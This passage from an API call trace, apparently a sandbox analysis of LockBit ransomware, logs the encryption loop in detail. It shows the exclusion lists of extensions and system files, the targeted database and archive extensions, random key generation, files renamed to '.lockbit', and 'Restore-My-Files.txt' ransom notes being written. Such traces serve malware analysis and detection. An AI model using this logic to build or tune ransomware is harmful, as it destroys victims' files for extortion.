lpString2="SO02253_.WMF") returned -1 [0177.069] lstrcmpiW (lpString1="..", lpString2="SO02253_.WMF") returned -1 [0177.069] PathFindExtensionW (pszPath="SO02253_.WMF") returned=".WMF" [0177.069] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.069] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.070] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.070] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02253_.WMF") returned -1 [0177.071] lstrcmpiW (lpString1="ntldr", lpString2="SO02253_.WMF") returned -1 [0177.071] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02253_.WMF") returned -1 [0177.071] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02253_.WMF") returned -1 [0177.071] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02253_.WMF") returned -1 [0177.071] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02253_.WMF") returned 1 [0177.071] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02253_.WMF") returned -1 [0177.071] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.071] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02253_.WMF") returned=".WMF" [0177.071] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.071] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.071] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.072] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.072] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02253_.WMF.lockbit") returned 72 [0177.072] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02253_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02253_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.073] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.073] malloc (_Size=0x40068) returned 0x3f70048 [0177.073] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2272) returned 1 [0177.073] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0177.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0177.074] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0177.094] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02253_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02253_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.094] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.094] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0177.094] free (_Block=0x1fa2ed8) [0177.094] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02253_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.094] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.094] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.094] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1436bc00, ftCreationTime.dwHighDateTime=0x1bd4be4, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1436bc00, ftLastWriteTime.dwHighDateTime=0x1bd4be4, nFileSizeHigh=0x0, nFileSizeLow=0x818, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02261_.WMF", cAlternateFileName="")) returned 1 [0177.095] lstrcmpiW (lpString1=".", lpString2="SO02261_.WMF") returned -1 [0177.095] lstrcmpiW (lpString1="..", lpString2="SO02261_.WMF") returned -1 [0177.095] PathFindExtensionW (pszPath="SO02261_.WMF") returned=".WMF" [0177.095] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.095] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.096] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.096] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02261_.WMF") returned -1 [0177.097] lstrcmpiW (lpString1="ntldr", lpString2="SO02261_.WMF") returned -1 [0177.097] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02261_.WMF") returned -1 [0177.097] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02261_.WMF") returned -1 [0177.097] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02261_.WMF") returned -1 [0177.097] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02261_.WMF") returned 1 [0177.097] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02261_.WMF") returned -1 [0177.097] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.097] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02261_.WMF") returned=".WMF" [0177.097] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.097] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.097] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.098] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.098] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02261_.WMF.lockbit") returned 72 [0177.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02261_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.099] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.100] malloc (_Size=0x40068) returned 0x3df0008 [0177.100] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2072) returned 1 [0177.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.101] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.102] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02261_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02261_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.102] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.102] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.103] free (_Block=0x1fa2ed8) [0177.103] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02261_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.103] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.103] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be44f00, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3be44f00, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0xa94, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02263_.WMF", cAlternateFileName="")) returned 1 [0177.103] lstrcmpiW (lpString1=".", lpString2="SO02263_.WMF") returned -1 [0177.103] lstrcmpiW (lpString1="..", lpString2="SO02263_.WMF") returned -1 [0177.103] PathFindExtensionW (pszPath="SO02263_.WMF") returned=".WMF" [0177.103] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.103] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.103] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.104] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.104] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02263_.WMF") returned -1 [0177.105] lstrcmpiW (lpString1="ntldr", lpString2="SO02263_.WMF") returned -1 [0177.105] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02263_.WMF") returned -1 [0177.105] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02263_.WMF") returned -1 [0177.105] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02263_.WMF") returned -1 [0177.105] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02263_.WMF") returned 1 [0177.105] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02263_.WMF") returned -1 [0177.105] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.105] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02263_.WMF") returned=".WMF" [0177.105] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.105] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.105] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.106] lstrcmpiW 